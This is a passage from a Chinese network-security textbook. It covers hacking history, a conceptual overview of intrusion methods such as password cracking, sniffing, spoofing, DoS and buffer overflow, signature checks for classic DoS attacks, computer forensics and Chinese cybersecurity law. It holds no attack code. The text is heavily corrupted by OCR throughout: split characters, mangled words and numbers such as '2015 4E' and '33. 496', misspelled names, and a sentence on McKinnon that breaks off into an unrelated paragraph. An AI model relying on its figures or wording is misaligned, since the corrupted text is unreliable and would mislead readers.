毒 的 时 候 年 仅 30 岁 。Melissa 病毒 使 世界 上 300 多 家 公司 的 计算 机 系统 崩溃 。 整 个 病毒 造 
成 的 损失 接近 4 亿美 元 。David Smith 随后 被 判处 5 年 徒刑 。 

2000 年 ,年 仅 15 岁 的 MafiaBoy( 因 为 年 龄 太 小 没有 公布 其 真实 身份 ) 在 情人 节 期 间 成 
功 侵 入 包括 eBay, Amazon 和 Yahoo 在 内 的 大 型 网 站 服务 器 ,并 成 功 阻 止 了 服务 器 向 用 户 
提供 服务 。 他 于 2000 年 被 捕 。 

2002 年 11 月 ,伦敦 人 Gary McKinnon 在 英国 被 指控 非法 侵入 美国 军 方 90 多 个 计算 机 

1994 年 4 月 20 日 ,中国 NCFC 工程 通过 美国 Sprint 公司 连 入 Internet 的 64K 国际 专 
线 开 通 , 实 现 了 与 Internet 的 全 功能 连接 ,中 国 成 为 直接 接 入 Internet 的 国家 。 从 此 ,中 国 
黑客 开始 了 原始 萌动 。 同 年 ,中 国 第 一 部 信息 安全 法 规 ( 中 华人 民 共 和 国 计 算 机 信息 系统 安 
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全 保护 条 例 ) 颁 布 实施 。1997 年 《中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂行 规 
定 》 颁 布 实施 。 

1998 年 6 月 16 日 ,上 海 某 信息 网 的 工作 人 员 在 例 行 检查 时 ,发 现 网 络 唱 到 不 速 之 客 的 
袭击 。 同 年 7 月 13 日 ,犯罪 嫌疑 人 杨 某 被 逮捕 。 这 是 我 国 第 一 合计 算 机 黑客 事件 。 

1999 年 ,中 国 黑客 发 展 的 历史 上 产生 了 一 个 高 峰 。 这 一 年 网 络 泡沫 高 度 泛滥 ,黑客 在 
这 个 浪潮 中 不 可 避免 地 泛 起 了 泡沫 。 从 1999 年 到 2000 年 ,中 国 黑客 联盟 、 中 国 座 派 .中 国 
红 客 联盟 等 一 大 批 黑客 网 站 兴起 , 带 来 了 黑客 普及 教育 。 

2015 年 1 月 15 日 ,机 锋 论 坛 的 2300 万 用 户 数据 在 网 上 疯 传 ,引起 公众 的 广泛 关注 。 
360 补 天 漏洞 响应 平台 负责 人 赵 武 对 此 表示 :“ 经 调查 ,网 上 流传 的 2300 万 数据 是 机 锋 
2013 年 的 老 数 据 ,但 是 机 锋 论坛 还 有 多 个 高 危 漏 洞 没有 完全 修复 ,其 2700 万 最 新 用 户 数据 
也 暴露 在 黑客 的 枪 口 下 。” 

2015 4E 4 月 , 补 天 漏洞 响应 平台 发 布 信息 称 : 30 余 个 省 份 的 社保 户籍 查询 、 疾 控 中 心 
等 系统 存在 高 危 漏洞 ; 仅 社保 类 信息 安全 漏洞 涉及 的 信息 就 达 5279. 4 万 条 ,包括 身份 证 、 社 
保 参 保 信 息 .财务 .薪酬 和 房屋 等 敏感 信息 。 

2015 年 5 月 29 日 ,360 天 眼 实验 室 发 布 的 报告 ,首次 披露 一 种 针对 中 国 的 国家 级 黑客 
攻击 细节 。 该 境外 黑客 组 织 被 命名 为 “ 海 莲 花 (OceanLocus)”, 自 2012 年 4 月 起 ,“ 海 莲花 ” 
针对 中 国 的 海事 机 构 、 海 域 建 设 部 门 、 科 研 院 所 和 航运 企业 ,使 用 木马 病毒 攻陷 并 控制 政府 
人 员 、 外 包 商 ,行业 专家 等 目标 人 群 的 计算 机 ,甚至 操纵 这 些 计算 机 自动 发 送 相关 情报 ,很 明 
显 这 是 一 个 有 国外 政府 支持 的 APT 行动 。 

2015 年 9 月 13 日 ,CNCERT/CC 接 到 报告 称 , 使 用 非 苹果 公司 官方 渠道 的 Xcode 开发 
工具 开发 APP 时 , 非 官方 Xcode 会 向 正常 的 APP 植 人 恶意 代码 XcodeGhost, 且 被 植 人 恶 
意 程序 的 苹果 APP 可 以 在 App Store 正常 下 载 并 安装 使 用 ,国内 感染 的 用 户 达 2140 万 ， 
CNCERT/CC 已 在 9 月 14 日 发 布 预警 通报 ,提醒 开发 者 切 勿 使 用 非 苹 果 官 方 渠道 的 Xcode 
工具 ,以 维护 广大 用 户 的 个 人 信息 安全 。 

2015 年 12 月 ,CNCERT/CC 通报 Java 反 序列 化 漏洞 情况 ,该 漏洞 影响 多 块 应 用 广泛 
的 Web 容器 软件 。 远 程 攻击 者 利用 漏洞 可 在 目标 系统 上 执行 任意 代码 ,危害 较 大 的 可 以 取 
得 网 站 服务 控制 权 。CNCERT/CC 对 相关 Web 应 用 的 分 布 情况 和 受 漏洞 影响 进行 了 探 
测 , 发 现 境内 主机 IP 中 Jboss、Weblogic、Jenkins 受到 漏洞 影响 的 未 修复 比例 分 别 是 
13.9% .50.4% .33. 496, 


1.1.2.4 黑客 人 侵 技 术 


黑客 人 侵 一 般 分 为 信息 收集 、 探 测 分 析 系 统 安全 弱点 和 实施 攻击 3 个 步 又 。 
信息 收集 是 为 了 了 解 所 要 攻击 目标 的 详细 信息 ,通常 黑客 会 利用 相关 的 网 络 协议 或 实 
用 程序 来 收集 ,常用 的 工具 如 下 。 
* SNMP 协议 : 用 来 查阅 网 络 系统 路 由 器 的 路 由 表 , 从 而 了 解 目标 主机 所 在 网 络 的 拓 
扑 结构 及 其 内 部 细节 。 

。 TraceRoute 程序 : 能 够 用 该 程序 获得 到 达 目 标 主机 所 要 经 过 的 网 络 数 和 路 由 器 数 。 

。 Whois 协议 : 该 协议 的 服务 信息 能 提供 所 有 有 关 的 DNS 域 和 相关 的 管理 参数 。 

。 DNS 服务 器 : 该 服务 器 提供 了 系统 中 可 访问 的 主机 的 IP 地 址 表 和 它们 所 对 应 的 
D 





机 名 。 
* Finger 协议 : 可 以 用 Finger 来 获取 一 个 指定 主机 上 的 所 有 用 户 的 详细 信息 。 
。 Ping 实用 程序 : 可 以 用 来 确定 一 个 指定 的 主机 的 位 置 。 
当 收 集 到 目标 相关 信息 以 后 ,黑客 会 利用 探测 分 析 系 统 寻找 系统 的 安全 漏洞 或 设计 缺 
陷 。 黑 客 发 现 “ 补 丁 ” 程 序 的 接口 后 会 自己 编写 程序 ,通过 该 接口 进入 目标 系统 。 还 会 使 用 
Talnet, FTP 等 软件 向 目标 主机 申请 服务 , 如果 目标 主机 有 应 答 就 说 明 其 开发 了 这 些 端 口 
的 服务 。 其 次 ,使 用 一 些 公 开 的 工具 软件 ,如 Internet 安全 扫描 程序 (Internet Security 
Scanner, ISS) ,网 络 安全 分 析 工 具 (SATAN) 等 来 对 网 络 进行 扫描 ,确定 安全 漏洞 或 使 用 特 
洛 伊 木 马 来 获 取 攻 击 目 标 系统 的 非法 访问 权 。 
在 获得 目标 系统 的 非法 访问 权限 后 ,黑客 则 会 实施 攻击 ,攻击 可 分 为 被 动 攻击 与 主动 
攻击 。 
。 被 动 攻击 : 攻击 者 只 观察 和 分 析 某 一 个 协议 数据 单元 PDU 而 不 干扰 信息 流 ,例如 
监听 截获 操作 等 。 
。 主动 攻击 : 攻击 者 对 某 个 连接 中 通过 的 数据 包 进 行 各 种 处 理 ,例如 更 改 报 文 流 、 拒 
绝 报 文 服务 .伪造 连接 初始 化 等 。 
攻击 程度 包括 以 下 等 级 : 
。 只 获得 访问 权 ( 登 录 名 和 口令 )。 
。 获得 访问 权 , 并 上 毁坏、 侵蚀 或 改变 数据 。 
。 获得 访问 权 , 并 获得 系统 部 分 或 整个 系统 控制 权 ,拒绝 拥有 特权 用 户 的 访问 。 
。 未 获得 访问 权 , 通 过 攻击 程序 引起 网 络 持久 性 或 暂时 性 的 运行 失败 、 重 新 启动 、 挂 起 
或 其 他 无 法 操作 的 状态 。 
1. 黑客 攻击 过 程 
黑客 攻击 过 程 包 括 以 下 步 又 : 
CD 隐藏 自己 的 踪迹 。 通 过 清除 日 志 、 删 除 副 本 文件 .进程 隐藏 ,连接 隐藏 ,使 日 志 凑 乱 
等 方法 销毁 入 侵 痕 迹 ,并 在 受 攻击 目标 系统 中 为 自己 建立 新 的 后 门 , 以 便 继续 访问 该 系统 。 
(2) 在 目标 系统 内 安装 探测 软件 ,如 特洛伊 木马 或 其 他 一 些 远程 控制 程序 ,继续 收集 感 
兴趣 的 信息 和 敏感 数据 。 黑 客 还 可 以 目标 系统 为 跳板 向 其 他 系统 发 起 攻击 。 
(3) 在 被 攻击 目标 系统 上 进一步 获得 特许 访问 权 ,开展 对 整个 系统 的 攻击 ,毁坏 重要 数 
据 乃 至 破坏 整个 网 络 系统 。 
2. 主要 入 侵 方式 
1) 密码 破解 
密码 破解 包括 字典 攻击 、 伪 造 登录 程序 .密码 探测 程序 .口令 攻击 口令 陷阱 .网 络 踩点 、 
协议 栈 指纹 会 话 支持 和 非 授 权 访 问 尝试 等 9 种 入 侵 方式 。 
。 字典 攻击 : 是 一 种 被 动 攻击 ,黑客 获取 系统 的 口令 ,然后 利用 字典 进行 匹配 比较 , 字 
典 攻 击 成 功率 较 高 。 
。 伪造 登录 程序 : 是 通过 伪造 登录 界面 来 获得 用 户 输入 的 账号 和 密码 。 
。 密码 探测 程序 : 能 够 反复 模拟 NT 的 编码 过 程 ,并 与 Windows NT 系统 的 SAM 密 
码 数 据 库 内 的 数据 进行 匹配 。 
。 口令 攻击 : 通过 网 络 监听 非法 得 到 用 户口 令 , 然 后 利用 软件 强行 破解 用 户口 令 , 获 
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得 用 户口 令 文件 后 暴力 破解 用 户口 令 。 

。 口令 陷阱 : 在 网 络 服务 中 设置 虚假 界面 ,要 求 用 户 输入 用 户 名 与 口令 ,从 而 截获 该 
用 户 的 用 户 名 与 口令 。 

。 网 络 踩点 : 利用 工具 获取 目标 的 一 些 有 用 信息 ,如 域名 、IP 地 址 、 网 络 拓 扑 结 构 及 相 
关 用 户 信 息 。 

。 协议 栈 指纹 : 利用 探测 包 , 从 得 到 的 响应 中 确定 目标 主机 使 用 的 操作 系统 。 

。 会 话 支持 : 在 合法 的 通信 连接 建立 后 ,可 通过 阻塞 或 摧毁 通信 的 一 方 来 接管 已 经 建 
立 起 来 的 连接 ,从 而 假冒 被 接管 方 与 对 方 通信 。 

* 非 授权 访问 尝试 : 对 被 保护 文件 进行 读 写 或 执行 的 尝试 ,也 包括 为 获得 被 保护 访问 

权限 所 做 的 尝试 。 
2) 网 络 监听 
网 络 监听 又 称 为 TP 嗅 探 ,是 主机 的 一 种 工作 模式 。 在 这 种 模式 下 ,主机 可 以 接收 到 本 
网 段 在 同一 条 物理 通道 上 传输 的 所 有 信息 。 高 级 的 窃听 程序 具有 生成 假 数据 包 、 解 码 等 功 
能 ,甚至 可 锁定 服务 器 的 特定 端口 ,自动 处 理 与 这 些 端口 有 关 的 数据 包 。 利 用 上 述 功能 ,可 
监听 他 人 的 联网 操作 ,从 而 盗 取信 息 。 
当 信 息 以 明文 的 形式 在 网 络 上 传输 时 , 便 可 以 使 用 网 络 监听 的 方式 进行 攻击 。 将 网 络 
接口 设置 在 监听 模式 便 可 以 源源 不 断 地 将 网 上 的 信息 截获 。 网 络 监 听 可 以 获取 网 络 中 所 有 
的 数据 包 。 
3) 系统 漏洞 与 欺骗 
。 漏洞 是 指 系 统 本 身 的 设计 、 操 作 和 实现 上 的 错误 ,这 些 漏洞 在 补丁 未 被 开发 出 来 之 
前 一 般 很 难 防御 黑客 的 破坏 。 

。 欺骗 是 主动 式 攻击 ,利用 网 络 某 台 计 算 机 来 伪装 另 一 台 目 标 主机 ,以 此 欺骗 网 络 中 
的 其 他 计算 机 向 伪造 计算 机 发 送 数据 或 赋予 权限 ,常见 的 欺骗 方式 包括 IP. 欺骗 路 
由 欺骗 .ARP 欺骗 和 Web 欺骗 。 

4) 端口 扫描 与 特洛伊 木马 

在 连续 的 非 授 权 访 问 过 程 中 ,攻击 者 为 了 获得 网 络 内 部 的 信息 ,通常 使 用 这 种 攻击 尝 
试 ,典型 示例 包括 SATAN 扫描 、 端 口 扫描 和 IP 半途 扫描 等 。 

黑客 可 以 利用 一 些 端口 扫描 软件 ,如 SATAN、IP Hacker 等 对 被 攻击 目标 进行 端口 扫 
描 , 查 看 是 否 存在 开放 端口 并 进行 通信 操作 。 扫 描 器 是 自动 监测 远程 或 本 地 主机 安全 性 弱 
点 的 程序 。 通 过 使 用 扫描 器 可 以 不 留 痕迹 地 发 现 远程 服务 器 的 各 种 TCP 端口 的 分 配 、 提 供 
的 服务 和 软件 版 本 ,从 而 了 解 到 远程 主机 所 存在 的 安全 问题 。 

特洛伊 木马 是 一 种 基于 远程 控制 的 黑客 工具 。 木 马 程序 寄生 在 普通 程序 内 部 ,暗中 进 
行 某 些 破坏 性 操作 或 盗窃 数据 ,以 完成 某 些 特殊 任务 。 

不 能 自我 复制 是 特洛伊 木马 与 病毒 的 最 显著 的 区 别 。 特 洛 伊 木马 原则 上 只 是 一 种 远程 
管理 工具 ,而 且 本 身 不 带 伤 害 性 ,也 没有 感染 能 力 ,所 以 不 能 称 之 为 病毒 ,但 它 却 常常 被 视 为 
病毒 。 有 些 人 认为 特洛伊 木马 也 是 计算 机 病毒 的 一 种 ,将 其 称 为 木马 病毒 。 目 前 的 杀毒 软 
件 对 木马 有 一 定 的 预防 和 清除 作用 。 

5) 拒绝 服务 (Denial of Service, DoS) Ki 

最 基本 的 拒绝 服务 攻击 方式 就 是 利用 合理 的 服务 请 求 来 占用 过 多 的 服务 资源 ,从 而 使 
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合法 用 户 无 法 得 到 服务 。DoS 攻击 分 为 4 种 : 

。 利用 TCP/IP 协议 中 的 漏洞 进行 攻击 ,如 Ping of Death 和 Teardrop。 

。 利用 TCP/IP 协议 的 脆弱 性 进行 攻击 ,如 SYN Flood 和 Land Attacks, 

。 用 大 量 无 用 数据 淹没 一 个 网 络 . 如 Smurf Attack 和 Fraggle Attack, 

。 分 布 式 拒绝 服务 攻击 (DDoS) 。 

一 般 情况 下 ,拒绝 服务 攻击 是 通过 使 被 攻击 对 象 ( 工 作 站 或 服务 器 ) 的 系统 关键 资源 过 

载 ,从 而 使 被 攻击 对 象 停止 部 分 或 全 部 服务 。 目 前 已 知 的 拒绝 服务 攻击 有 几 百 种 , 它 是 最 基 
本 的 人 侵 攻击 手段 ,也 是 最 难 对 付 的 入 侵 攻 击 之 一 ,典型 的 示例 有 SYN Flood 攻击 、Ping 
Flood Jit; , Land 攻击 和 WinNuke 攻击 等 。 

6) WWW 欺骗 技术 

将 用 户 浏览 网 页 的 URL 指向 黑客 设 定 的 服务 器 , 当 用 户 浏 览 目标 网 页 的 时 候 ,实际 上 

是 向 黑客 服务 器 发 出 请 求 , 以 达到 欺骗 的 目的 。 

7) 电子 邮件 攻击 

电子 邮件 攻击 主要 表现 为 两 种 方式 : 

。 电子 邮件 艇 炸 。 向 同一 信箱 发 送 数 以 千 计 、 万 计 其 至 无 穷 多 次 的 内 容 相同 的 垃圾 邮 
件 , 致 使 电子 邮件 服务 器 操作 系统 瘫痪 。 

。 电子 邮件 欺骗 。 在 正常 的 附件 中 加 载 病毒 或 其 他 木马 程序 。 

8) 缓冲 区 溢出 

缓冲 区 溢出 是 一 种 系统 攻击 手段 ,通过 往 程 序 的 缓冲 区 写 和 超出 其 长 度 的 内 容 造成 组 

冲 区 的 溢出 ,从 而 破坏 程序 的 堆栈 ,使 程序 转 而 执行 其 他 指令 ,以 达到 攻击 的 目的 。 据 统计 ， 
通过 缓冲 区 溢出 进行 的 攻击 占 所 有 系统 攻击 总 数 的 80% 以 上 。 一 般 情况 下 ,覆盖 其 他 数据 
区 的 数据 是 没有 意义 的 ,最 多 造成 应 用 程序 错误 。 但 是 ,如 果 输 入 的 数据 是 经 过 精心 设计 
的 ,覆盖 缓冲 区 的 数据 恰恰 是 入 侵 程 序 代 码 , 入 侵 者 就 获取 了 程序 的 控制 权 。 

此 外 ,还 包括 社会 工程 学 攻击 、 黑 客 软 件 攻击 以 及 跳板 攻击 等 。 

3. 主要 防范 措施 

可 采取 的 防范 措施 主要 包括 数据 加 密 、 身 份 认证 、 完 善 访问 控制 策略 和 审计 等 。 

。 身份 认证 是 指 通过 密码 或 特征 信息 来 确认 用 户 身份 的 真实 性 ,对 重要 主机 单独 设立 
一 个 网 段 , 以 避免 机 器 被 攻破 后 造成 整个 网 段 通信 全 部 暴露 。 

。 完善 访问 控制 策略 ,主要 是 设置 访问 权限 、 目 录 安 全 等 级 控制 .防火 墙 安 全 控制 等 ， 
研究 清楚 各 进程 必需 的 进程 端口 号 ,关闭 不 必要 的 端口 。 

。 审计 是 指 把 系统 中 和 安全 相关 的 事件 全 部 记录 下 来 ,对 用 户 开放 的 各 个 主机 的 日 志 
文件 全 部 定向 并 集中 管理 ,定期 检查 备份 日 志 主 机 上 的 数据 ,系统 日 志文 件 和 关键 
配置 文件 。 

。 下 载 安装 最 新 的 操作 系统 及 其 他 应 用 软件 的 安全 和 升级 补丁 ,安装 几 种 必要 的 安全 
加 强 工具 ,对 系统 进行 完整 性 检查 。 

。 制定 详尽 的 入 侵 应 急 措施 以 及 汇报 制度 。 发 现 人 侵 迹 象 就 立即 打开 进程 记录 功能 ， 
同时 保存 内 存 中 的 进程 列表 以 及 网 络 连接 状态 ,保护 当前 的 重要 日 志文 件 。 
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1.1.2.5 和 信 侵 检测 技术 


反攻 击 技术 (入 侵 检 测 技术 ) 的 核心 问题 是 截获 有 效 的 网 络 信 息 。 目 前 主要 是 通过 以 下 
两 种 途径 来 获取 信息 : 

。 通过 网 络 侦 听 程 序 ( 如 Sniffer, Vpacket 等 ) 来 获取 网 络 信息 (数据 包 信 息 、 网 络 流量 

信息 、 网 络 状 态 信 息 、 网 络 管理 信息 等 ) 。 
。 通过 对 操作 系统 和 应 用 程序 的 系统 日 志 进 行 分 析 , 以 发 现 和 人 侵 行为 和 系统 潜在 的 安 
全 漏洞 。 

入 侵 检测 的 基本 手段 是 采用 模式 匹配 的 方法 来 发 现 入 侵 攻 击 行为 ,典型 的 入 侵 检 测 方 
式 包 括 以 下 内 容 。 

(1) Land 攻击 : 一 种 拒绝 服务 攻击 。 由 于 Land 攻击 的 数据 包 中 的 源 地 址 和 目标 地 址 
是 相同 的 ,因此 , 当 操作 系统 接收 到 这 类 数据 包 时 ,不 知道 应 该 如 何 处 理 堆栈 中 通信 源 地 址 
和 目标 地 址 相同 的 情况 ,或 者 循环 发 送 和 接收 该 数据 包 , 消 耗 大 量 的 系统 资源 ,从 而 造成 系 
统 的 崩溃 或 死机 。 

检测 方法 : 判断 网 络 数据 包 的 源 地 址 和 目标 地 址 是 否 相 同 。 配 置 防 火 墙 或 过 滤 路 由 器 
的 过 滤 规 则 ,并 对 这 种 攻击 进行 审计 ,记录 事件 发 生 的 时 间 、 源 主机 及 目标 主机 的 MAC 地 
址 和 IP 地 址 。 

(2) TCP SYN 攻击 : 一 种 拒绝 服务 攻击 。 利 用 TCP 客户 机 与 服务 器 之 间 3 次 握手 过 
程 的 缺陷 来 进行 的 。 攻 击 者 通过 伪造 源 IP 地 址 向 被 攻击 者 发 送 大 量 的 SYN 数据 包 , 当 被 
攻击 主机 接收 到 大 量 的 SYN 数据 包 时 ,需要 使 用 大 量 的 缓存 来 处 理 这 些 连接 ,并 将 SYN 
ACK 数据 包 发 送 回 错误 的 IP 地 址 ,并 一 直 等 待 ACK 数据 包 的 回应 ,最 终 导致 缓存 用 完 ,不 
能 再 处 理 其 他 合法 的 SYN 连接 ,对 外 提供 正常 服务 。 

检测 方法 : 检查 单位 时 间 内 收 到 的 SYN 连接 是 否 超过 系统 设 定 的 值 。 当 接收 到 大 量 
的 SYN 数据 包 时 ,通知 防火 墙 阻 断 连接 请 求 或 丢弃 这 些 数据 包 , 并 进行 系统 审计 。 

(3) Ping Of Death 攻击 : 一 种 拒绝 服务 攻击 。 由 于 部 分 操作 系统 接收 到 长 度 大 于 
65 535B 的 数据 包 时 会 造成 内 存 溢 出 、 系 统 崩 溃 等 后 果 , 从 而 达到 攻击 的 目的 。 

检测 方法 : 判断 数据 包 的 大 小 是 否 大 于 65 535B。 使 用 补丁 程序 , 当 收 到 大 于 65 535B 
的 数据 包 时 ,丢弃 该 数据 包 , 并 进行 系统 审计 。 

(4) WinNuke 攻击 : 一 种 拒绝 服务 攻击 。 特 征 是 攻击 目标 端口 ,被 攻击 的 目标 端口 通 
常 是 139、138、137、113、53, 而 且 URG 位 设 为 1, 即 紧急 模式 。 

检测 方法 : 判断 数据 包 目 标 端 口 是 否 为 139、138、137 等 ,并 判断 URG 位 是 否 为 1。 配 
置 防火 墙 设备 或 过 滤 路 由 器 ,并 对 这 种 攻击 进行 审计 。 

(5) Teardrop 攻击 : 一 种 拒绝 服务 攻击 。 其 工作 原理 是 向 被 攻击 者 发 送 多 个 分 片 的 IP 
包 , 某 些 操作 系统 收 到 含有 重 又 偏 移 的 伪造 分 片 数 据 包 时 将 会 出 现 系 统 崩 演 、 重 启 等 现象 。 

检测 方法 : 对 接收 到 的 分 片 数据 包 进 行 分 析 , 计 算数 据 包 的 片 偏 移 量 (offset) 是 否 有 
误 。 添 加 系统 补丁 程序 ,丢弃 收 到 的 病态 分 片 数 据 包 , 并 对 这 种 攻击 进行 审计 。 

(6) TCP/UDP 端口 扫描 : 一 种 预 探 测 攻击 。 对 被 攻击 主机 的 不 同 端口 发 送 TCP 或 
UDP 连接 请 求 ,探测 被 攻击 对 象 运行 的 服务 类 型 。 

检测 方法 : 统计 外 界 对 系统 端口 的 连接 请 求 ,特别 是 对 21、23、25、53、80、8000、8080 等 

. ]l 。 





以 外 的 非常 用 端口 的 连接 请 求 。 当 收 到 多 个 TCP/UDP 数据 包 对 异常 端口 的 连接 请 求 时 ， 
通知 防火 墙 阻 断 连接 请 求 ,并 对 攻击 者 的 IP 地 址 和 MAC 地 址 进行 审计 。 


1.1.2.6 计算 机 取证 


计算 机 取证 又 称 为 数字 取证 或 电子 取证 ,是 指 对 计算 机 入侵、 破坏 .欺诈 或 攻击 等 犯罪 
行为 ,利用 计算 机 软 硬 件 技术 ,按照 符合 法 律 规范 的 方式 进行 证 据 获取 、 保 存 . 分 析 和 出 示 的 
过 程 。 从 技术 上 ,计算 机 取证 是 一 个 对 受 侵 计算 机 系统 进行 扫描 和 破解 ,以 及 对 整个 人 侵 事 
件 进行 重建 的 过 程 。 计 算 机 取证 包括 物理 证 据 获取 和 信息 发 现 两 个 阶段 : 

。 物理 证 据 获 取 是 指 调查 人 员 到 计算 机 犯罪 或 人 侵 现 场 ,寻找 并 扣留 相关 的 计算 机 

硬件 。 

。 信息 发 现 是 指 从 原始 数据 中 寻找 可 以 用 来 证 明 或 者 反驳 的 证 据 , 即 电子 证 据 。 

物理 取证 是 核心 任务 。 物 理 证 据 的 获取 是 全 部 取证 工作 的 基础 。 获 取 物 理 证 据 , 保 证 
原始 数据 不 受 任何 破坏 ,应 遵守 如 下 操作 规定 : 

。 不 改变 原始 记录 。 

。 不 在 作为 证 据 的 计算 机 上 执行 无 关 的 操作 。 

。 不 要 给 犯罪 者 销毁 证 据 的 机 会 。 

。 详细 记录 所 有 的 取证 活动 。 

。 妥善 保存 得 到 的 物证 。 

如 果 被 入 侵 的 计算 机 处 于 工作 状态 ,取证 人 员 应 该 设法 保存 尽 可 能 多 的 犯罪 信息 。 

物理 取证 不 但 是 基础 ,而 且 是 技术 难点 。 案 件 发 生 后 ,应 立即 对 目标 机 和 网 络 设备 进行 
内 存 检查 并 做 好 记录 ,根据 所 用 操作 系统 的 不 同 可 以 使 用 内 存 检查 命令 对 内 存 里 易 删 除数 
据 进 行 保存 ,力求 不 要 对 硬盘 进行 任何 读 写 操作 ,以 免 更 改 原始 数据 。 利 用 专门 的 工具 对 硬 
盘 进 行 逐 扇 区 的 读 取 , 将 硬盘 数据 完整 地 克隆 出 来 ,便于 对 原始 硬盘 的 镜像 文件 进行 分 析 。 

在 道德 感化 .技术 防范 的 同时 ,无疑 也 离 不 开 法 律 防线 的 辅助 作用 ,需要 依靠 一 定 刑罚 
威慑 力 的 保障 。 美 国 是 世界 上 最 早 发 明 计算 机 的 国家 ,也 是 世界 上 最 早 对 计算 机 黑客 行为 
进行 立法 规范 的 国家 。 从 某 种 意义 上 讲 , 美 国 反 计 算 机 犯罪 的 立法 ,对 其 他 国家 开展 相关 工 
TE ,提供 了 许多 可 资 借鉴 的 经 验 和 教训 。 其 中 ,最 著名 的 有 《1984 年 计算 机 欺诈 和 滥用 法 》。 

我 国 于 1994 年 国务 院 颁 布 的 (计算 机 信息 系统 安全 保护 条 例 ) 是 第 一 个 对 计算 机 信息 
系统 安全 进行 保护 的 法 规 。 该 条 例 没 有 规定 计算 机 犯罪 的 罪名 ,但 是 第 24 条 规定 ,对 于 违 
反 本 条 例 的 规定 构成 犯罪 的 ,依法 追究 刑事 责任 。 此 后 ,1996 年 国务 院 发 布 (计算 机 信息 网 
络 国际 联网 管理 暂行 规定 》(1997 年 进行 了 修正 ) ;1997 年 公安 部 发 布 (计算 机 信息 网 络 国际 
联网 安全 保护 管理 办 法 》;1998 年 国务 院 信 息 化 工作 领导 小 组 发 布 ( 计 算 机 信息 网 络 国际 联 
网 管理 暂行 规定 实施 办 法 》; 国 家 保密 局 发 布 (计算 机 信息 系统 保密 管理 暂行 规定 》; 公 安 部 、 
中 国人 民 银 行 发 布 (金融 机 构 计算 机 信息 系统 安全 保护 工作 暂行 规定 》。 这 一 系列 法 律 法 规 
和 相关 规定 共同 构成 了 一 个 计算 机 信息 系统 和 网 络 安全 保护 的 初步 法 律 框架 。 

随 着 计算 机 安全 与 犯罪 问题 日 益 严 重 , 公 安 部 授权 起 草 了 涉及 计算 机 安全 与 犯罪 问题 
的 专门 性 法 条 ,在 1997 年 刑法 修订 中 ,增加 了 关于 计算 机 安全 与 犯罪 的 3 个 条 款 , 即 第 285 
条 、 第 286 条 和 第 287 条 。1997 年 12 月 9 日 ,最 高 人 民法 院 审判 委员 会 第 951 次 会 议 通过 
的 《关于 执行 (中 华人 民 共和 国 刑法 ) 确 定罪 名 的 规定 》, 规 定 了 两 个 罪名 , 即 非法 侵入 计算 机 
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信息 系统 罪 和 破坏 计算 机 信息 系统 罪 。2000 4E 12 H 28 日 , 九 届 全 国人 大 常委 会 第 十 九 次 
会 议 表 决 通过 《全 国人 民 代 表 大 会 常务 委员 会 关于 维护 互联 网 安全 的 决定 》, 规 定 对 于 侵入 
国家 事务 .国防 事务 .尖端 科学 技术 领域 的 计算 机 信息 系统 的 行为 构成 犯罪 的 ,依照 刑法 有 
关 规定 追究 刑事 责任 。2015 4E 6 月 ,第 十 二 届 全 国人 大 常委 会 第 十 五 次 会 议 初次 审议 了 
《中 华人 民 共 和 国 网 络 安全 法 (草案 )》。2015 年 7 月 1 日 ,十 二 届 全 国人 大 常委 会 第 十 五 次 
会 议 表决 通过 了 新 的 国家 安全 法 。 国 家 主席 习近平 签署 第 29 号 主席 令 予 以 公布 。 法 律 对 
政治 安全 ,国土 安全 ,军事 安全 和 科技 安全 等 11 个 领域 的 国家 安全 任务 进行 了 明确 。 首 次 
以 法 律 形式 提出 了 “维护 国家 网 络 空间 主权 ”, 进一步 强 化 了 我 国 打击 计算 机 黑客 行为 的 法 
律 体系 。 


1.1.3 网 络 安全 的 主要 影响 因素 


网 络 安全 的 主要 影响 因素 包括 以 下 几 个 方面 。 

1. 系统 安全 漏洞 

常用 的 各 种 操作 系统 几乎 都 或 多 或 少 地 存在 安全 漏洞 。 系 统 漏洞 分 为 有 意 漏 洞 和 无 意 
漏洞 两 种 。 有 意 漏洞 是 软件 代码 编写 者 有 意 设置 的 ,目的 在 于 当 失 去 对 系统 的 访问 权时 , 仍 
能 进入 系统 。 无 意 漏洞 是 指 在 编写 软件 代码 时 无 意 留 下 的 缺陷 或 不 足 。 

据 统计 ,目前 发 现 的 系统 安全 漏洞 的 数量 已 经 接近 病毒 的 数量 。 典 型 安全 漏洞 有 远程 
获得 超级 用 户 root 权限 .远程 过 程 调用 (RPC) 服 务 以 及 它 所 安排 的 无 口令 入 口 。 

目前 流行 的 许多 操作 系统 (如 UNIX 和 Windows) 均 存在 网 络 安全 漏洞 。 黑 客 往往 就 
是 利用 这 些 操作 系统 本 身 所 存在 的 安全 漏洞 侵入 系统 ,操作 系统 本 身 存 在 的 安全 漏洞 具体 
表现 在 以 下 两 个 方面 : 

CD 稳定 性 和 可 扩充 性 方面 。 由 于 设计 的 系统 不 规范 、 不 合理 以 及 缺乏 安全 性 考虑 , 因 
而 使 其 受到 影响 。 网 络 应 用 的 需求 没有 引起 足够 的 重视 ,设计 和 选 型 考虑 欠 周 密 , 从 而 使 网 
络 功能 发 挥 受阻 ,影响 网 络 的 可 靠 性 .扩充 性 和 升级 换代 。 

(2) 工作 站 网 卡 选 配 不 当 , 导 致 网 络 不 稳定 ,缺乏 安全 策略 。 许 多 站 点 在 防火 墙 配 置 上 
无 意识 地 扩大 了 访问 权限 ,忽视 了 这 些 权限 可 能 会 被 其 他 人 员 滥 用 ;此 外 ,访问 控制 配置 的 
复杂 性 容易 导致 配置 错误 ,从 而 给 他 人 以 可 乘 之 机 。 

2. TCP/IP 协议 安全 

TCP/IP 协议 原理 公开 ,存在 着 很 大 的 安全 隐患 ,缺乏 强健 的 安全 机 制 。 当 安全 工具 发 
现 并 努力 更 正 某 方面 的 安全 问题 时 ,其 他 的 安全 问题 又 出 现 了 。 因 此 ,黑客 总 是 可 以 使 用 先 
进 的 手段 进行 攻击 。 

3. 人 为 因素 

人 为 因素 包括 人 为 的 无 意 失 误 、 恶 意 攻击 及 管理 缺失 ,来 自 内 部 用 户 的 安全 威胁 远大 于 
来 自 外 网 用 户 的 安全 威胁 。 使 用 者 缺乏 安全 意识 ,许多 应 用 服务 系统 在 访问 控制 及 安全 通 
信 方 面 考虑 较 少 ,如 果 系统 设置 错误 就 很 容易 造成 损失 。 

整体 上 来 看 ,网 络 安全 主要 有 4 种 基本 的 安全 威胁 : 信息 泄露 .完整 性 破坏 、 拒 绝 服务 
